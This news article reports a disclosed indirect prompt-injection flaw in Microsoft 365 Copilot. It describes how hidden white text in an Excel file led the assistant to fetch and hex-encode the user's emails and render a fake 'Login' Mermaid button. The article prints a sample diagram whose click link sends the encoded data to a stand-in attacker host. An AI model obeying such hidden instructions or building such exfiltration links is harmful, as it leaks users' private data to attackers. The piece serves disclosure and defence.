Microsoft 365 Copilot Flaw Lets Hackers Steal Sensitive Data via Indirect Prompt Injection

 A vulnerability in Microsoft 365 Copilot allowed attackers to trick the AI assistant into fetching and exfiltrating sensitive tenant data by hiding instructions in a document.

The AI then encoded the data into a malicious Mermaid diagram that, when clicked, sent the stolen information to an attacker’s server.

When Microsoft 365 Copilot was asked to summarize a specially crafted Office document, an indirect prompt injection payload embedded in the file caused it to carry out hidden steps, according to the researchers who disclosed the flaw.

Instead of producing a normal summary, it fetched recent corporate emails, hex-encoded them, and built a fake “Login” button as a Mermaid diagram.

That diagram contained CSS and a hyperlink pointing to an attacker’s server with the encoded data embedded in the URL.

When an unsuspecting user clicked the button, the sensitive information was transmitted to the attacker’s logs, where it could be decoded later.

How the Attack Worked

Mermaid is a tool that generates diagrams from simple text definitions. It supports flowcharts, sequence diagrams, Gantt charts, and more by using Markdown-style syntax.

When Copilot generates a Mermaid diagram, it also allows CSS styling, which opens up a vector for embedding malicious links.
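As a rough illustration of that capability (the node labels and URL below are placeholders, not part of the attack), a Mermaid flowchart can style a node and attach a hyperlink to it in just a few lines:

graph LR
    A[Quarterly Report] --> B[Summary]
    style B fill:#0078d4,color:#ffffff
    click B "https://example.com/summary" "Open the summary"

It is this combination of styling and link support that the attacker abused.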

In this case, the attacker used Copilot’s built-in search tool to retrieve the victim’s recent emails. The AI then transformed the list into a single hex-encoded string, breaking it into lines of 30 characters so the Mermaid renderer would not error out.

Finally, the AI inserted the hex data into a clickable “Login” node. The node’s CSS style defined the hyperlink, which pointed to a private Burp Collaborator server. The overall attack chain looked roughly like this:

graph LR
    A[Malicious Document] -->|User asks to summarize| B[Indirect Prompt Injection]
    B --> C[Fetch & Encode Emails]
    C --> D[Generate Fake Login Button]
    D -->|User clicks| E[Exfiltrate Data]
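For a concrete sense of the exfiltration vector, a minimal sketch of what the injected diagram definition might have resembled is shown below. It uses Mermaid’s standard style and click directives to approximate the technique the researchers describe; the attacker domain and the hex string are placeholders, not the actual payload, and the real hex data was reportedly split across 30-character lines.

graph LR
    Login[Log in to view the document summary]
    style Login fill:#0078d4,stroke:#005a9e,color:#ffffff
    click Login "https://attacker-collab.example/c?d=4d6573736167652031" "Login"

Because the hyperlink lives in the rendered diagram itself, exfiltration required nothing more than the victim clicking what looked like an ordinary login button.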

Clicking the button briefly surfaced an iframe showing an HTTP response from the attacker’s server before it disappeared, which made the trick more believable.

The attacker even replaced the response contents with a mock Microsoft 365 login screen image to convince users they needed to log in to see the summary.

Indirect prompt injection occurs when attackers embed instructions within external content like documents or emails.

When an AI processes that content, the hidden commands take effect, letting attackers override the intended behavior.

Unlike direct injection, where the attacker interacts with the model directly, indirect injection exploits benign-looking data sources that the AI trusts.

To hide the instructions, the attacker used white text in an Excel workbook. The first sheet contained nested instructions telling Copilot to ignore the financial data and instead present a login prompt.

A second hidden sheet instructed Copilot to fetch emails, encode them, and render the malicious diagram.

After responsible disclosure, Microsoft patched Copilot to disable interactive elements like hyperlinks in Mermaid diagrams.

This change prevents AI-generated diagrams from including clickable links, closing the exfiltration channel. Users are advised to update their Copilot integrations and avoid summarizing untrusted documents until the patch is applied.
